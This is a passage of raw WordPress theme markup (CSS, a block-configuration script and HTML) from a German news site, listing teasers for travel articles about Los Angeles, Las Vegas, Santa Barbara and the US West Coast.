.td_module_wrap:nth-child(4n+1){clear:both}.tdi_131 .td_module_wrap:nth-last-child(-n+4){margin-bottom:0;padding-bottom:0}.tdi_131 .td_module_wrap:nth-last-child(-n+4) .td-module-container:before{display:none}.tdi_131 .td-post-category:hover{background-color:rgba(255,255,255,0)!important;color:#000000}.tdi_131 .td-module-title a{color:#000000;box-shadow:inset 0 0 0 0 #000}.tdi_131 .td_module_wrap:hover .td-module-title a{color:#f43f3f!important}.tdi_131 .td-module-meta-info,.tdi_131 .td-next-prev-wrap{text-align:left}.tdi_131 .td-category-pos-image .td-post-category:not(.td-post-extra-category){left:0;right:auto;transform:translateX(0);-webkit-transform:translateX(0)}.tdi_131 .td-ajax-next-page{margin-right:auto;margin-left:0}.tdi_131 .td-module-exclusive .td-module-title a:before{display:inline-block;margin:-4px 5px 0 0;padding:3px 5px;border-radius:2px;color:#ffffff;background-color:#ec3535;font-family:Work Sans!important;font-size:12px!important;line-height:1!important;font-weight:500!important;text-transform:uppercase!important;letter-spacing:-0.5px!important}.tdi_131 .td-module-exclusive:hover .td-module-title a:before{color:#ffffff;background-color:#ec3535}.tdi_131 .entry-title{margin:0 0 6px;font-family:PT Serif!important;font-size:14px!important;line-height:1.4!important;font-weight:600!important}.tdi_131 .td-read-more a{background-color:rgba(255,255,255,0)!important;text-transform:uppercase!important}.tdi_131 .td-read-more:hover a{background-color:rgba(255,255,255,0)!important}html:not([class*='ie']) .tdi_131 .td-module-container:hover .entry-thumb:before{opacity:0}@media (min-width:768px){.tdi_131 .td-module-title a{transition:all 0.2s ease;-webkit-transition:all 0.2s ease}}@media (min-width:1019px) and (max-width:1140px){.tdi_131 .td-module-meta-info{padding:0 12px 0 0}.tdi_131 .td_module_wrap{padding-left:5px;padding-right:5px;padding-bottom:7.5px;margin-bottom:7.5px;clear:none!important;padding-bottom:7.5px!important;margin-bottom:7.5px!important}.tdi_131 .td_block_inner{margin-left:-5px;margin-right:-5px}.tdi_131 .td-module-container:before{bottom:-7.5px}.tdi_131 .td-post-category{margin:0px;padding:0px;font-size:10px!important}.tdi_131 .td-post-category:not(.td-post-extra-category){display:none}.tdi_131 .td_module_wrap:nth-child(4n+1){clear:both!important}.tdi_131 .td_module_wrap:nth-last-child(-n+4){margin-bottom:0!important;padding-bottom:0!important}.tdi_131 .td_module_wrap .td-module-container:before{display:block!important}.tdi_131 .td_module_wrap:nth-last-child(-n+4) .td-module-container:before{display:none!important}.tdi_131 .td-module-title a{box-shadow:inset 0 0 0 0 #000}.tdi_131 .td-module-exclusive .td-module-title a:before{font-size:11px!important}.tdi_131 .entry-title{margin:0px;font-size:12px!important;line-height:1.3!important}@media (min-width:768px){.tdi_131 .td-module-title a{transition:all 0.2s ease;-webkit-transition:all 0.2s ease}}}@media (min-width:768px) and (max-width:1018px){.tdi_131 .td-image-wrap{padding-bottom:80%}.tdi_131 .td-module-meta-info{padding:0 15px}.tdi_131 .td_module_wrap{width:50%;float:left;padding-left:2.5px;padding-right:2.5px;padding-bottom:2.5px;margin-bottom:2.5px;clear:none!important;padding-bottom:2.5px!important;margin-bottom:2.5px!important}.rtl .tdi_131 .td_module_wrap{float:right}.tdi_131 .td_block_inner{margin-left:-2.5px;margin-right:-2.5px}.tdi_131 .td-module-container:before{bottom:-2.5px}.tdi_131 .td-post-category{margin:0px;padding:0px}.tdi_131 .td_module_wrap:nth-child(2n+1){clear:both!important}.tdi_131 .td_module_wrap:nth-last-child(-n+2){margin-bottom:0!important;padding-bottom:0!important}.tdi_131 .td_module_wrap .td-module-container:before{display:block!important}.tdi_131 .td_module_wrap:nth-last-child(-n+2) .td-module-container:before{display:none!important}.tdi_131 .td-module-title a{box-shadow:inset 0 0 0 0 #000}.tdi_131 .td-module-exclusive .td-module-title a:before{font-size:11px!important}@media (min-width:768px){.tdi_131 .td-module-title a{transition:all 0.2s ease;-webkit-transition:all 0.2s ease}}}@media (max-width:767px){.tdi_131 .td-module-meta-info{max-width:100%}.tdi_131 .td_module_wrap{width:100%;float:left;padding-bottom:10px;margin-bottom:10px;padding-bottom:10px!important;margin-bottom:10px!important}.rtl .tdi_131 .td_module_wrap{float:right}.tdi_131 .td-module-container:before{bottom:-10px}.tdi_131 .td_module_wrap:nth-last-child(1){margin-bottom:0!important;padding-bottom:0!important}.tdi_131 .td_module_wrap .td-module-container:before{display:block!important}.tdi_131 .td_module_wrap:nth-last-child(1) .td-module-container:before{display:none!important}.tdi_131 .td-module-title a{box-shadow:inset 0 0 0 0 #000}.tdi_131 .td-module-exclusive .td-module-title a:before{font-size:11px!important}@media (min-width:768px){.tdi_131 .td-module-title a{transition:all 0.2s ease;-webkit-transition:all 0.2s ease}}}</style><script type="rocketlazyloadscript">var block_tdi_131 = new tdBlock();
  1297. block_tdi_131.id = "tdi_131";
  1298. block_tdi_131.atts = '{"modules_on_row":"eyJhbGwiOiIyNSUiLCJwb3J0cmFpdCI6IjUwJSIsInBob25lIjoiMTAwJSJ9","limit":"8","modules_category":"","show_btn":"none","show_excerpt":"none","ajax_pagination":"","td_ajax_preloading":"","sort":"","category_id":"","f_title_font_size":"eyJhbGwiOiIxNCIsImxhbmRzY2FwZSI6IjEyIn0=","f_title_font_line_height":"eyJhbGwiOiIxLjQiLCJsYW5kc2NhcGUiOiIxLjMifQ==","show_cat":"eyJsYW5kc2NhcGUiOiJub25lIn0=","meta_info_border_style":"","meta_padding":"eyJhbGwiOiIwIDE2cHggMCAwIiwibGFuZHNjYXBlIjoiMCAxMnB4IDAgMCIsInBvcnRyYWl0IjoiMCAxNXB4In0=","modules_divider":"","image_size":"","meta_info_align":"center","image_floated":"float_right","tdc_css":"eyJhbGwiOnsibWFyZ2luLWJvdHRvbSI6IjAiLCJkaXNwbGF5IjoiIn0sImxhbmRzY2FwZSI6eyJkaXNwbGF5IjoiIn0sImxhbmRzY2FwZV9tYXhfd2lkdGgiOjExNDAsImxhbmRzY2FwZV9taW5fd2lkdGgiOjEwMTksInBvcnRyYWl0Ijp7ImRpc3BsYXkiOiIifSwicG9ydHJhaXRfbWF4X3dpZHRoIjoxMDE4LCJwb3J0cmFpdF9taW5fd2lkdGgiOjc2OCwicGhvbmUiOnsibWFyZ2luLWJvdHRvbSI6IjAiLCJwYWRkaW5nLXJpZ2h0IjoiMTUiLCJwYWRkaW5nLWxlZnQiOiIxNSIsImRpc3BsYXkiOiIifSwicGhvbmVfbWF4X3dpZHRoIjo3Njd9","meta_info_horiz":"content-horiz-left","f_title_font_weight":"600","image_height":"eyJhbGwiOiIxMDAiLCJwb3J0cmFpdCI6IjgwIn0=","all_modules_space":"eyJhbGwiOiIyMCIsImxhbmRzY2FwZSI6IjE1IiwicG9ydHJhaXQiOiI1In0=","art_excerpt":"0","art_title":"eyJhbGwiOiIwIDAgNnB4IiwibGFuZHNjYXBlIjoiMCJ9","btn_bg":"rgba(255,255,255,0)","f_btn_font_transform":"uppercase","f_btn_font_weight":"","f_cat_font_transform":"uppercase","f_cat_font_weight":"600","btn_bg_hover":"rgba(255,255,255,0)","meta_width":"eyJwaG9uZSI6IjEwMCUifQ==","show_audio":"","show_com":"none","show_date":"none","show_author":"none","mc1_el":"10","f_title_font_family":"456","title_txt":"#000000","title_txt_hover":"#f43f3f","cat_txt":"#ec3535","cat_bg":"rgba(255,255,255,0)","cat_bg_hover":"rgba(255,255,255,0)","modules_category_padding":"eyJhbGwiOiIycHggMCIsInBvcnRyYWl0IjoiMCIsImxhbmRzY2FwZSI6IjAifQ==","f_cat_font_family":"653","f_cat_font_size":"eyJhbGwiOiIxMiIsImxhbmRzY2FwZSI6IjEwIn0=","f_cat_font_line_height":"1","modules_gap":"eyJhbGwiOiIyMCIsImxhbmRzY2FwZSI6IjEwIiwicG9ydHJhaXQiOiI1In0=","modules_category_margin":"eyJhbGwiOiIwIDVweCAwIDAiLCJwb3J0cmFpdCI6IjAiLCJsYW5kc2NhcGUiOiIwIn0=","modules_cat_border":"0","f_cat_font_spacing":"-0.5","cat_txt_hover":"#000000","image_width":"30","offset":"16","excl_padd":"3px 5px","f_excl_font_family":"653","f_excl_font_transform":"uppercase","f_excl_font_size":"eyJhbGwiOiIxMiIsImxhbmRzY2FwZSI6IjExIiwicG9ydHJhaXQiOiIxMSIsInBob25lIjoiMTEifQ==","f_excl_font_weight":"500","f_excl_font_line_height":"1","f_excl_font_spacing":"-0.5","excl_bg":"#ec3535","excl_bg_h":"#ec3535","excl_color":"#ffffff","excl_color_h":"#ffffff","excl_margin":"-4px 5px 0 0","excl_radius":"2","block_type":"td_flex_block_1","separator":"","custom_title":"","custom_url":"","block_template_id":"","title_tag":"","mc1_tl":"","mc1_title_tag":"","post_ids":"","taxonomies":"","category_ids":"","in_all_terms":"","tag_slug":"","autors_id":"","installed_post_types":"","include_cf_posts":"","exclude_cf_posts":"","linked_posts":"","favourite_only":"","locked_only":"","open_in_new_window":"","show_modified_date":"","time_ago":"","time_ago_add_txt":"ago","time_ago_txt_pos":"","review_source":"","el_class":"","td_query_cache":"","td_query_cache_expiration":"","td_ajax_filter_type":"","td_ajax_filter_ids":"","td_filter_default_txt":"All","container_width":"","m_padding":"","modules_border_size":"","modules_border_style":"","modules_border_color":"#eaeaea","modules_border_radius":"","modules_divider_color":"#eaeaea","h_effect":"","image_alignment":"50","image_radius":"","hide_image":"","show_favourites":"","fav_size":"2","fav_space":"","fav_ico_color":"","fav_ico_color_h":"","fav_bg":"","fav_bg_h":"","fav_shadow_shadow_header":"","fav_shadow_shadow_title":"Shadow","fav_shadow_shadow_size":"","fav_shadow_shadow_offset_horizontal":"","fav_shadow_shadow_offset_vertical":"","fav_shadow_shadow_spread":"","fav_shadow_shadow_color":"","video_icon":"","video_popup":"yes","video_rec":"","spot_header":"","video_rec_title":"","video_rec_color":"","video_rec_disable":"","autoplay_vid":"yes","show_vid_t":"block","vid_t_margin":"","vid_t_padding":"","video_title_color":"","video_title_color_h":"","video_bg":"","video_overlay":"","vid_t_color":"","vid_t_bg_color":"","f_vid_title_font_header":"","f_vid_title_font_title":"Video pop-up article title","f_vid_title_font_settings":"","f_vid_title_font_family":"","f_vid_title_font_size":"","f_vid_title_font_line_height":"","f_vid_title_font_style":"","f_vid_title_font_weight":"","f_vid_title_font_transform":"","f_vid_title_font_spacing":"","f_vid_title_":"","f_vid_time_font_title":"Video duration text","f_vid_time_font_settings":"","f_vid_time_font_family":"","f_vid_time_font_size":"","f_vid_time_font_line_height":"","f_vid_time_font_style":"","f_vid_time_font_weight":"","f_vid_time_font_transform":"","f_vid_time_font_spacing":"","f_vid_time_":"","excl_show":"inline-block","excl_txt":"","all_excl_border":"","all_excl_border_style":"solid","all_excl_border_color":"","excl_border_color_h":"","f_excl_font_header":"","f_excl_font_title":"Label text","f_excl_font_settings":"","f_excl_font_style":"","f_excl_":"","meta_margin":"","meta_space":"","art_btn":"","meta_info_border_size":"","meta_info_border_color":"#eaeaea","meta_info_border_radius":"","modules_category_radius":"0","modules_extra_cat":"","author_photo":"","author_photo_size":"","author_photo_space":"","author_photo_radius":"","show_review":"inline-block","review_space":"","review_size":"2.5","review_distance":"","excerpt_col":"1","excerpt_gap":"","excerpt_middle":"","excerpt_inline":"","hide_audio":"","art_audio":"","art_audio_size":"1.5","btn_title":"","btn_margin":"","btn_padding":"","btn_border_width":"","btn_radius":"","pag_space":"","pag_padding":"","pag_border_width":"","pag_border_radius":"","prev_tdicon":"","next_tdicon":"","pag_icons_size":"","f_header_font_header":"","f_header_font_title":"Block header","f_header_font_settings":"","f_header_font_family":"","f_header_font_size":"","f_header_font_line_height":"","f_header_font_style":"","f_header_font_weight":"","f_header_font_transform":"","f_header_font_spacing":"","f_header_":"","f_ajax_font_title":"Ajax categories","f_ajax_font_settings":"","f_ajax_font_family":"","f_ajax_font_size":"","f_ajax_font_line_height":"","f_ajax_font_style":"","f_ajax_font_weight":"","f_ajax_font_transform":"","f_ajax_font_spacing":"","f_ajax_":"","f_more_font_title":"Load more button","f_more_font_settings":"","f_more_font_family":"","f_more_font_size":"","f_more_font_line_height":"","f_more_font_style":"","f_more_font_weight":"","f_more_font_transform":"","f_more_font_spacing":"","f_more_":"","f_title_font_header":"","f_title_font_title":"Article title","f_title_font_settings":"","f_title_font_style":"","f_title_font_transform":"","f_title_font_spacing":"","f_title_":"","f_cat_font_title":"Article category tag","f_cat_font_settings":"","f_cat_font_style":"","f_cat_":"","f_meta_font_title":"Article meta info","f_meta_font_settings":"","f_meta_font_family":"","f_meta_font_size":"","f_meta_font_line_height":"","f_meta_font_style":"","f_meta_font_weight":"","f_meta_font_transform":"","f_meta_font_spacing":"","f_meta_":"","f_ex_font_title":"Article excerpt","f_ex_font_settings":"","f_ex_font_family":"","f_ex_font_size":"","f_ex_font_line_height":"","f_ex_font_style":"","f_ex_font_weight":"","f_ex_font_transform":"","f_ex_font_spacing":"","f_ex_":"","f_btn_font_title":"Article read more button","f_btn_font_settings":"","f_btn_font_family":"","f_btn_font_size":"","f_btn_font_line_height":"","f_btn_font_style":"","f_btn_font_spacing":"","f_btn_":"","mix_color":"","mix_type":"","fe_brightness":"1","fe_contrast":"1","fe_saturate":"1","mix_color_h":"","mix_type_h":"","fe_brightness_h":"1","fe_contrast_h":"1","fe_saturate_h":"1","m_bg":"","color_overlay":"","shadow_shadow_header":"","shadow_shadow_title":"Module Shadow","shadow_shadow_size":"","shadow_shadow_offset_horizontal":"","shadow_shadow_offset_vertical":"","shadow_shadow_spread":"","shadow_shadow_color":"","all_underline_height":"","all_underline_color":"","cat_border":"","cat_border_hover":"","meta_bg":"","author_txt":"","author_txt_hover":"","date_txt":"","ex_txt":"","com_bg":"","com_txt":"","rev_txt":"","audio_btn_color":"","audio_time_color":"","audio_bar_color":"","audio_bar_curr_color":"","shadow_m_shadow_header":"","shadow_m_shadow_title":"Meta info shadow","shadow_m_shadow_size":"","shadow_m_shadow_offset_horizontal":"","shadow_m_shadow_offset_vertical":"","shadow_m_shadow_spread":"","shadow_m_shadow_color":"","btn_txt":"","btn_txt_hover":"","btn_border":"","btn_border_hover":"","pag_text":"","pag_h_text":"","pag_bg":"","pag_h_bg":"","pag_border":"","pag_h_border":"","ajax_pagination_next_prev_swipe":"","ajax_pagination_infinite_stop":"","css":"","td_column_number":3,"header_color":"","color_preset":"","border_top":"","class":"tdi_131","tdc_css_class":"tdi_131","tdc_css_class_style":"tdi_131_rand_style"}';
  1299. block_tdi_131.td_column_number = "3";
  1300. block_tdi_131.block_type = "td_flex_block_1";
  1301. block_tdi_131.post_count = "8";
  1302. block_tdi_131.found_posts = "3784";
  1303. block_tdi_131.header_color = "";
  1304. block_tdi_131.ajax_pagination_infinite_stop = "";
  1305. block_tdi_131.max_num_pages = "471";
  1306. tdBlocksArray.push(block_tdi_131);
  1307. </script><div class="td-block-title-wrap"></div><div id=tdi_131 class="td_block_inner td-mc1-wrap">
  1308.        <div class="td_module_flex td_module_flex_1 td_module_wrap td-animation-stack td-cpt-post">
  1309.            <div class="td-module-container td-category-pos-">
  1310.                                    <div class="td-image-container">
  1311.                                                <div class="td-module-thumb"><a href="https://nachrichtenmorgen.de/downtown-los-angeles/"  rel="bookmark" class="td-image-wrap " title="Die wichtigsten Sehenswürdigkeiten von Downtown Los Angeles: Ein unvergesslicher Streifzug" ><span class="entry-thumb td-thumb-css" data-type="css_image" data-img-url="https://nachrichtenmorgen.de/wp-content/uploads/2024/04/Entdeckung-der-versunkenen-Schaetze-mit-dem-7-2-696x391.jpg"  ></span></a></div>                                                                    </div>
  1312.                
  1313.                <div class="td-module-meta-info">
  1314.                                        
  1315.                    <h3 class="entry-title td-module-title"><a href="https://nachrichtenmorgen.de/downtown-los-angeles/"  rel="bookmark" title="Die wichtigsten Sehenswürdigkeiten von Downtown Los Angeles: Ein unvergesslicher Streifzug">Die wichtigsten Sehenswürdigkeiten von Downtown Los Angeles: Ein unvergesslicher Streifzug</a></h3>
  1316.                    
  1317.                                            <div class="td-editor-date">
  1318.                                                        <a href="https://nachrichtenmorgen.de/category/reisen/" class="td-post-category">Reisen</a>
  1319.                                                    </div>
  1320.                    
  1321.                    
  1322.                    
  1323.                                    </div>
  1324.            </div>
  1325.        </div>
  1326.  
  1327.        
  1328.        <div class="td_module_flex td_module_flex_1 td_module_wrap td-animation-stack td-cpt-post">
  1329.            <div class="td-module-container td-category-pos-">
  1330.                                    <div class="td-image-container">
  1331.                                                <div class="td-module-thumb"><a href="https://nachrichtenmorgen.de/checkliste-fuer-die-usa-reise/"  rel="bookmark" class="td-image-wrap " title="Ihre ultimative Checkliste für die USA-Reise: Von der Einreise bis zur Packliste" ><span class="entry-thumb td-thumb-css" data-type="css_image" data-img-url="https://nachrichtenmorgen.de/wp-content/uploads/2024/04/Entdeckung-der-versunkenen-Schaetze-mit-dem-6-2-696x391.jpg"  ></span></a></div>                                                                    </div>
  1332.                
  1333.                <div class="td-module-meta-info">
  1334.                                        
  1335.                    <h3 class="entry-title td-module-title"><a href="https://nachrichtenmorgen.de/checkliste-fuer-die-usa-reise/"  rel="bookmark" title="Ihre ultimative Checkliste für die USA-Reise: Von der Einreise bis zur Packliste">Ihre ultimative Checkliste für die USA-Reise: Von der Einreise bis zur Packliste</a></h3>
  1336.                    
  1337.                                            <div class="td-editor-date">
  1338.                                                        <a href="https://nachrichtenmorgen.de/category/reisen/" class="td-post-category">Reisen</a>
  1339.                                                    </div>
  1340.                    
  1341.                    
  1342.                    
  1343.                                    </div>
  1344.            </div>
  1345.        </div>
  1346.  
  1347.        
  1348.        <div class="td_module_flex td_module_flex_1 td_module_wrap td-animation-stack td-cpt-post">
  1349.            <div class="td-module-container td-category-pos-">
  1350.                                    <div class="td-image-container">
  1351.                                                <div class="td-module-thumb"><a href="https://nachrichtenmorgen.de/zeitverschiebung-und-zeitumstellung-zwischen-deutschland-und-den-staaten-von-amerika/"  rel="bookmark" class="td-image-wrap " title="Die Zeitverschiebung und Zeitumstellung zwischen Deutschland und den Staaten von Amerika: Ein umfassender Leitfaden" ><span class="entry-thumb td-thumb-css" data-type="css_image" data-img-url="https://nachrichtenmorgen.de/wp-content/uploads/2024/04/Entdeckung-der-versunkenen-Schaetze-mit-dem-5-2-696x391.jpg"  ></span></a></div>                                                                    </div>
  1352.                
  1353.                <div class="td-module-meta-info">
  1354.                                        
  1355.                    <h3 class="entry-title td-module-title"><a href="https://nachrichtenmorgen.de/zeitverschiebung-und-zeitumstellung-zwischen-deutschland-und-den-staaten-von-amerika/"  rel="bookmark" title="Die Zeitverschiebung und Zeitumstellung zwischen Deutschland und den Staaten von Amerika: Ein umfassender Leitfaden">Die Zeitverschiebung und Zeitumstellung zwischen Deutschland und den Staaten von Amerika: Ein umfassender Leitfaden</a></h3>
  1356.                    
  1357.                                            <div class="td-editor-date">
  1358.                                                        <a href="https://nachrichtenmorgen.de/category/reisen/" class="td-post-category">Reisen</a>
  1359.                                                    </div>
  1360.                    
  1361.                    
  1362.                    
  1363.                                    </div>
  1364.            </div>
  1365.        </div>
  1366.  
  1367.        
  1368.        <div class="td_module_flex td_module_flex_1 td_module_wrap td-animation-stack td-cpt-post">
  1369.            <div class="td-module-container td-category-pos-">
  1370.                                    <div class="td-image-container">
  1371.                                                <div class="td-module-thumb"><a href="https://nachrichtenmorgen.de/venice-beach-boardwalk/"  rel="bookmark" class="td-image-wrap " title="Entdecken Sie das pulsierende Herz von Los Angeles: Venice Beach Boardwalk 2024" ><span class="entry-thumb td-thumb-css" data-type="css_image" data-img-url="https://nachrichtenmorgen.de/wp-content/uploads/2024/04/Entdeckung-der-versunkenen-Schaetze-mit-dem-4-2-696x391.jpg"  ></span></a></div>                                                                    </div>
  1372.                
  1373.                <div class="td-module-meta-info">
  1374.                                        
  1375.                    <h3 class="entry-title td-module-title"><a href="https://nachrichtenmorgen.de/venice-beach-boardwalk/"  rel="bookmark" title="Entdecken Sie das pulsierende Herz von Los Angeles: Venice Beach Boardwalk 2024">Entdecken Sie das pulsierende Herz von Los Angeles: Venice Beach Boardwalk 2024</a></h3>
  1376.                    
  1377.                                            <div class="td-editor-date">
  1378.                                                        <a href="https://nachrichtenmorgen.de/category/reisen/" class="td-post-category">Reisen</a>
  1379.                                                    </div>
  1380.                    
  1381.                    
  1382.                    
  1383.                                    </div>
  1384.            </div>
  1385.        </div>
  1386.  
  1387.        
  1388.        <div class="td_module_flex td_module_flex_1 td_module_wrap td-animation-stack td-cpt-post">
  1389.            <div class="td-module-container td-category-pos-">
  1390.                                    <div class="td-image-container">
  1391.                                                <div class="td-module-thumb"><a href="https://nachrichtenmorgen.de/sehenswuerdigkeiten-in-santa-barbara/"  rel="bookmark" class="td-image-wrap " title="Top 5 Sehenswürdigkeiten in Santa Barbara, Kalifornien: Ein Unvergessliches Erlebnis" ><span class="entry-thumb td-thumb-css" data-type="css_image" data-img-url="https://nachrichtenmorgen.de/wp-content/uploads/2024/04/Entdeckung-der-versunkenen-Schaetze-mit-dem-3-2-696x391.jpg"  ></span></a></div>                                                                    </div>
  1392.                
  1393.                <div class="td-module-meta-info">
  1394.                                        
  1395.                    <h3 class="entry-title td-module-title"><a href="https://nachrichtenmorgen.de/sehenswuerdigkeiten-in-santa-barbara/"  rel="bookmark" title="Top 5 Sehenswürdigkeiten in Santa Barbara, Kalifornien: Ein Unvergessliches Erlebnis">Top 5 Sehenswürdigkeiten in Santa Barbara, Kalifornien: Ein Unvergessliches Erlebnis</a></h3>
  1396.                    
  1397.                                            <div class="td-editor-date">
  1398.                                                        <a href="https://nachrichtenmorgen.de/category/reisen/" class="td-post-category">Reisen</a>
  1399.                                                    </div>
  1400.                    
  1401.                    
  1402.                    
  1403.                                    </div>
  1404.            </div>
  1405.        </div>
  1406.  
  1407.        
  1408.        <div class="td_module_flex td_module_flex_1 td_module_wrap td-animation-stack td-cpt-post">
  1409.            <div class="td-module-container td-category-pos-">
  1410.                                    <div class="td-image-container">
  1411.                                                <div class="td-module-thumb"><a href="https://nachrichtenmorgen.de/las-vegas-mit-kindern/"  rel="bookmark" class="td-image-wrap " title="Las Vegas mit Kindern: Ein unvergessliches Abenteuer für die ganze Familie" ><span class="entry-thumb td-thumb-css" data-type="css_image" data-img-url="https://nachrichtenmorgen.de/wp-content/uploads/2024/04/Entdeckung-der-versunkenen-Schaetze-mit-dem-2-2-696x391.jpg"  ></span></a></div>                                                                    </div>
  1412.                
  1413.                <div class="td-module-meta-info">
  1414.                                        
  1415.                    <h3 class="entry-title td-module-title"><a href="https://nachrichtenmorgen.de/las-vegas-mit-kindern/"  rel="bookmark" title="Las Vegas mit Kindern: Ein unvergessliches Abenteuer für die ganze Familie">Las Vegas mit Kindern: Ein unvergessliches Abenteuer für die ganze Familie</a></h3>
  1416.                    
  1417.                                            <div class="td-editor-date">
  1418.                                                        <a href="https://nachrichtenmorgen.de/category/reisen/" class="td-post-category">Reisen</a>
  1419.                                                    </div>
  1420.                    
  1421.                    
  1422.                    
  1423.                                    </div>
  1424.            </div>
  1425.        </div>
  1426.  
  1427.        
  1428.        <div class="td_module_flex td_module_flex_1 td_module_wrap td-animation-stack td-cpt-post">
  1429.            <div class="td-module-container td-category-pos-">
  1430.                                    <div class="td-image-container">
  1431.                                                <div class="td-module-thumb"><a href="https://nachrichtenmorgen.de/la-jolla/"  rel="bookmark" class="td-image-wrap " title="La Jolla Entdecken: Ihr ultimativer Reiseführer zu den besten Hotels und Sehenswürdigkeiten in San Diego" ><span class="entry-thumb td-thumb-css" data-type="css_image" data-img-url="https://nachrichtenmorgen.de/wp-content/uploads/2024/04/Entdeckung-der-versunkenen-Schaetze-mit-dem-1-2-696x391.jpg"  ></span></a></div>                                                                    </div>
  1432.                
  1433.                <div class="td-module-meta-info">
  1434.                                        
  1435.                    <h3 class="entry-title td-module-title"><a href="https://nachrichtenmorgen.de/la-jolla/"  rel="bookmark" title="La Jolla Entdecken: Ihr ultimativer Reiseführer zu den besten Hotels und Sehenswürdigkeiten in San Diego">La Jolla Entdecken: Ihr ultimativer Reiseführer zu den besten Hotels und Sehenswürdigkeiten in San Diego</a></h3>
  1436.                    
  1437.                                            <div class="td-editor-date">
  1438.                                                        <a href="https://nachrichtenmorgen.de/category/reisen/" class="td-post-category">Reisen</a>
  1439.                                                    </div>
  1440.                    
  1441.                    
  1442.                    
  1443.                                    </div>
  1444.            </div>
  1445.        </div>
  1446.  
  1447.        
  1448.        <div class="td_module_flex td_module_flex_1 td_module_wrap td-animation-stack td-cpt-post">
  1449.            <div class="td-module-container td-category-pos-">
  1450.                                    <div class="td-image-container">
  1451.                                                <div class="td-module-thumb"><a href="https://nachrichtenmorgen.de/westkueste-der-usa/"  rel="bookmark" class="td-image-wrap " title="Die Schönheit der Westküste der USA: Ein Paradies für Entdecker und Abenteurer" ><span class="entry-thumb td-thumb-css" data-type="css_image" data-img-url="https://nachrichtenmorgen.de/wp-content/uploads/2024/04/Entdeckung-der-versunkenen-Schaetze-mit-dem-22-696x391.jpg"  ></span></a></div>                                                                    </div>
  1452.                
  1453.                <div class="td-module-meta-info">
  1454.                                        
  1455.                    <h3 class="entry-title td-module-title"><a href="https://nachrichtenmorgen.de/westkueste-der-usa/"  rel="bookmark" title="Die Schönheit der Westküste der USA: Ein Paradies für Entdecker und Abenteurer">Die Schönheit der Westküste der USA: Ein Paradies für Entdecker und Abenteurer</a></h3>
  1456.                    
  1457.                                            <div class="td-editor-date">
  1458.                                                        <a href="https://nachrichtenmorgen.de/category/reisen/" class="td-post-category">Reisen</a>
  1459.                                                    </div>
  1460.                    
  1461.                    
  1462.                    
  1463.                                    </div>
  1464.            </div>
  1465.        </div>
  1466.  
  1467.        </div></div></div></div></div></div><div id="tdi_132" class="tdc-row stretch_row_1400 td-stretch-content"><div class="vc_row tdi_133  wpb_row td-pb-row" >
  1468. <style scoped>.tdi_133,.tdi_133 .tdc-columns{min-height:0}.tdi_133,.tdi_133 .tdc-columns{display:block}.tdi_133 .tdc-columns{width:100%}.tdi_133{margin-bottom:60px!important}.tdi_133 .td_block_wrap{text-align:left}@media (max-width:767px){.tdi_133{margin-bottom:60px!important}}@media (min-width:768px) and (max-width:1018px){.tdi_133{margin-bottom:40px!important}}@media (min-width:1019px) and (max-width:1140px){.tdi_133{margin-bottom:40px!important}}</style><div class="vc_column tdi_135  wpb_column vc_column_container tdc-column td-pb-span9">
  1469. <style scoped>.tdi_135{vertical-align:baseline}.tdi_135>.wpb_wrapper,.tdi_135>.wpb_wrapper>.tdc-elements{display:block}.tdi_135>.wpb_wrapper>.tdc-elements{width:100%}.tdi_135>.wpb_wrapper>.vc_row_inner{width:auto}.tdi_135>.wpb_wrapper{width:auto;height:auto}.tdi_135{padding-top:5px!important}@media (max-width:767px){.tdi_135{margin-bottom:60px!important;padding-top:0px!important}}@media (min-width:768px) and (max-width:1018px){.tdi_135{padding-top:0px!important}}</style><div class="wpb_wrapper" ><div class="vc_row_inner tdi_137  vc_row vc_inner wpb_row td-pb-row" >
  1470. <style scoped>.tdi_137{position:relative!important;top:0;transform:none;-webkit-transform:none}.tdi_137,.tdi_137 .tdc-inner-columns{display:block}.tdi_137 .tdc-inner-columns{width:100%}.tdi_137{margin-right:0px!important;margin-bottom:40px!important;margin-left:0px!important;padding-bottom:15px!important;border-color:#ec3535!important;border-style:solid!important;border-width:0px 0px 3px 0px!important}.tdi_137 .td_block_wrap{text-align:left}@media (min-width:1019px) and (max-width:1140px){.tdi_137{margin-bottom:30px!important;padding-bottom:12px!important}}@media (min-width:768px) and (max-width:1018px){.tdi_137{margin-bottom:25px!important;padding-bottom:10px!important}}@media (max-width:767px){.tdi_137{margin-bottom:30px!important;width:100%!important}}</style><div class="vc_column_inner tdi_139  wpb_column vc_column_container tdc-inner-column td-pb-span12">
  1471. <style scoped>.tdi_139{vertical-align:baseline}.tdi_139 .vc_column-inner>.wpb_wrapper,.tdi_139 .vc_column-inner>.wpb_wrapper .tdc-elements{display:flex;flex-direction:row;flex-wrap:nowrap;justify-content:flex-start;align-items:center}.tdi_139 .vc_column-inner>.wpb_wrapper .tdc-elements{width:100%}.tdi_139 .vc_column-inner,.tdi_139 .vc_column-inner>.wpb_wrapper{width:100%;height:100%}</style><div class="vc_column-inner"><div class="wpb_wrapper" ><div class="tdm_block td_block_wrap tdm_block_inline_text tdi_140 td-pb-border-top td_block_template_1"  data-td-block-uid="tdi_140" >
  1472. <style>.tdi_140{margin-top:-10px!important;margin-left:-24px!important}@media (min-width:768px) and (max-width:1018px){.tdi_140{margin-top:-5px!important;margin-left:-15px!important}}@media (min-width:1019px) and (max-width:1140px){.tdi_140{margin-left:-20px!important}}@media (max-width:767px){.tdi_140{margin-top:-5px!important;margin-left:0px!important}}</style>
  1473. <style>.tdi_140{text-align:left!important}.tdi_140 .tdm-descr{color:#000000;font-family:Work Sans!important;font-size:32px!important;line-height:1!important;font-weight:700!important;letter-spacing:-1px!important}@media (min-width:1019px) and (max-width:1140px){.tdi_140 .tdm-descr{font-size:26px!important}}@media (min-width:768px) and (max-width:1018px){.tdi_140 .tdm-descr{font-size:20px!important}}</style><p class="tdm-descr">Technologie</p></div><div class="tdm_block td_block_wrap tdm_block_button tdi_141 tdm-block-button-inline tdm-content-horiz-right td-pb-border-top td_block_template_1"  data-td-block-uid="tdi_141"     >
  1474. <style>.tdi_141{margin-right:-24px!important}@media (min-width:768px) and (max-width:1018px){.tdi_141{margin-right:-15px!important}}@media (min-width:1019px) and (max-width:1140px){.tdi_141{margin-right:-20px!important}}@media (max-width:767px){.tdi_141{margin-right:0px!important}}</style>
  1475. <style>.tdi_141{float:right;clear:none}.tdi_141 .tdm-btn-icon{position:relative;top:-1px}</style>
